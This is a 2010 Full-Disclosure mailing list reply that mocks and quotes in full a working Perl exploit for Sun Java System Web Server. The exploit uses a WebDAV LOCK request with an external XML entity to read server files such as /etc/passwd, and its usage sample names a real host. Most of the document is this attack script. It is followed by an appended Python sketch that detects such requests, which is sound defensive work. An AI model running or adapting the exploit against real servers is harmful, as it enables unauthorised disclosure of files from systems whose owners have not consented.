Message-ID: <v2r3af3d47c1004030737se0629015q777beb5f8a613dca@mail.gmail.com>
Date: Sat, 3 Apr 2010 16:37:19 +0200
From: Christian Sciberras <uuf6429@...il.com>
To: Kingcope <kcope2@...glemail.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Sun D3VS SM0KiNG PoT AGAiN

"Sun D3VS SM0KiNG PoT AGAiN"
"SuPP0RT iF YOU#RE kRAD KTHX"

What the fuck is wrong with you guys?
Ever gave the psychiatrist a visit?






On Sat, Apr 3, 2010 at 3:14 PM, Kingcope <kcope2@...glemail.com> wrote:

> sun-knockout.pl EXPLOiT CORRECTED, ADD AUTHEN+SSL SuPP0RT iF YOU#RE kRAD
> KTHX
>
> #!/usr/bin/perl
> # aNOTH3R TiP OF THE iCE-BERG ReMOTE eXPLoiT
> # oO SUN MiCROSYSTEMZ - SUN JAVA SYSTEM WEB SERVER Oo
> # oO REMOTE FiLE DiSCLOSURE EXPLOIT Oo
> # oO BUG FOUND & EXPLOiTED BY KiNGCOPE // ISOWAREZ.DE Oo
> # !! THIS EXPLOIT IS NOW PRIVATE ON FULL DISCLOSURE !!
> # MAY/2010
> # VERY THANKS TO LSD
> #
> #
> # oO VERiFIED oN Oo
> #
> # SUN JAVA SYSTEM WEB SERVER 7.0U4 B12/02/2008 [PLatFoRMz: WiNDOWS
> SERVER 2008 & SunOS 5.10]
> # SHOULD GiVE YOU READABLE FiLES BY UID WEBSERVD
> # [SunONE/iPLANET MAY ALSO BE EXPLOiTABLE]
> # RoCKiNG tHA SuRFACE SiNCE 2003 kTHX
>
> use IO::Socket;
> use MIME::Base64;
>
> print "//Sun Microsystems Sun Java System Web Server\n";
> print "//Remote File Disclosure Exploit\n";
> print "//by Kingcope\n";
> print "May/2010\n";
>
> if ($#ARGV != 2) {
>         print "usage: perl sunone.pl <target> <webdav directory> <file to
> get>\n";
>        print "sample: perl sunone.pl lib7.berkeley.edu /dav
> /etc/passwd\n";
>         exit;
> }
>
> $target = $ARGV[0];
>
> $|=1;
>
> $remotefile = $ARGV[2];
> $folder = $ARGV[1];
>
> $KRADXmL =
> "<?xml version=\"1.0\"?>\n"
> ."<!DOCTYPE REMOTE [\n"
> ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
> ."]>\n"
> ."<D:lockinfo xmlns:D='DAV:'>\n"
> ."<D:lockscope><D:exclusive/></D:lockscope>\n"
> ."<D:locktype><D:write/></D:locktype>\n"
> ."<D:owner>\n"
> ."<D:href>\n"
> ."<REMOTE>\n"
> ."<RemoteX>&RemoteX;</RemoteX>\n"
> ."</REMOTE>\n"
> ."</D:href>\n"
> ."</D:owner>\n"
> ."</D:lockinfo>\n";
>
> $sock = IO::Socket::INET->new(PeerAddr => $target,
>                               PeerPort => '80',
>                              Proto    => 'tcp');
>
> print $sock "LOCK /$folder HTTP/1.1\r\n".
>                        "Host: $target\r\n".
>                        "Depth: 0\r\n".
>                        "Connection: close\r\n".
>                        "Content-Type: application/xml\r\nContent-Length:
> ".length($KRADXmL)."\r\n\r\n".
>                        $KRADXmL;
>
> $locktoken = "";
> while(<$sock>) {
>        if ($_ =~ /^Lock-token:\s(.*)?\r/) {
>                $locktoken = $1;
>                chomp $locktoken;
>        }
>        print;
> }
>
> close($sock);
>
> $sock = IO::Socket::INET->new(PeerAddr => $target,
>                               PeerPort => '80',
>                               Proto    => 'tcp');
>
> print $sock "UNLOCK /$folder HTTP/1.1\r\n".
>                        "Host: $target\r\n".
>                        "Connection: close\r\n".
>                        "Lock-token: $locktoken\r\n\r\n";
>
> while(<$sock>) {
>        print;
> }
> close($sock);
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
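The quoted script sends a WebDAV LOCK request whose XML body declares a DOCTYPE with a SYSTEM entity and references that entity inside the lock owner element. As an added example that is not part of the original messages, the following sketch flags such request bodies on the defending side; the function names, the host `dav.example.test`, and the sample requests are constructed for illustration.

```python
import re

# WebDAV methods that carry an XML request body (RFC 4918).
XML_BODY_METHODS = {"LOCK", "PROPFIND", "PROPPATCH"}

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# <!ENTITY name SYSTEM "..."> or PUBLIC, including parameter entities (%).
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?:%\s+)?[^\s>]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)

def decode_body(body: bytes) -> str:
    """Decode the body so a UTF-16 encoding cannot hide markup from the regexes."""
    if body[:2] in (b"\xff\xfe", b"\xfe\xff"):   # UTF-16 with BOM
        return body.decode("utf-16", errors="replace")
    if body[:2] == b"<\x00":                     # UTF-16LE without BOM
        return body.decode("utf-16-le", errors="replace")
    if body[:2] == b"\x00<":                     # UTF-16BE without BOM
        return body.decode("utf-16-be", errors="replace")
    return body.decode("latin-1")

def inspect_request(raw: bytes) -> list:
    """Return findings for one raw HTTP request (empty list means nothing flagged)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].decode("latin-1").split()
    if len(parts) < 2 or parts[0].upper() not in XML_BODY_METHODS:
        return []
    text = decode_body(body)
    findings = []
    if DOCTYPE_RE.search(text):
        findings.append("doctype-in-webdav-body")
    if EXTERNAL_ENTITY_RE.search(text):
        findings.append("external-entity-declaration")
    return findings

# Constructed sample requests (not captured traffic); host and paths are placeholders.
LOCKINFO = ("<D:lockinfo xmlns:D='DAV:'><D:lockscope><D:exclusive/></D:lockscope>"
            "<D:locktype><D:write/></D:locktype>"
            "<D:owner><D:href>%s</D:href></D:owner></D:lockinfo>")
HEAD = b"LOCK /dav HTTP/1.1\r\nHost: dav.example.test\r\n\r\n"
BENIGN = HEAD + (LOCKINFO % "mailto:user@example.test").encode()
SUSPECT_XML = ('<?xml version="1.0"?><!DOCTYPE r [<!ENTITY x SYSTEM '
               '"/placeholder/path">]>' + LOCKINFO % "<r>&x;</r>")
SUSPECT = HEAD + SUSPECT_XML.encode()
SUSPECT_UTF16 = HEAD + SUSPECT_XML.encode("utf-16")

if __name__ == "__main__":
    for name in ("BENIGN", "SUSPECT", "SUSPECT_UTF16"):
        print(name, inspect_request(globals()[name]))
```

A legitimate lockinfo body has no reason to carry a DOCTYPE, so either finding on a WebDAV method is worth alerting on or rejecting at a proxy in front of the server.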
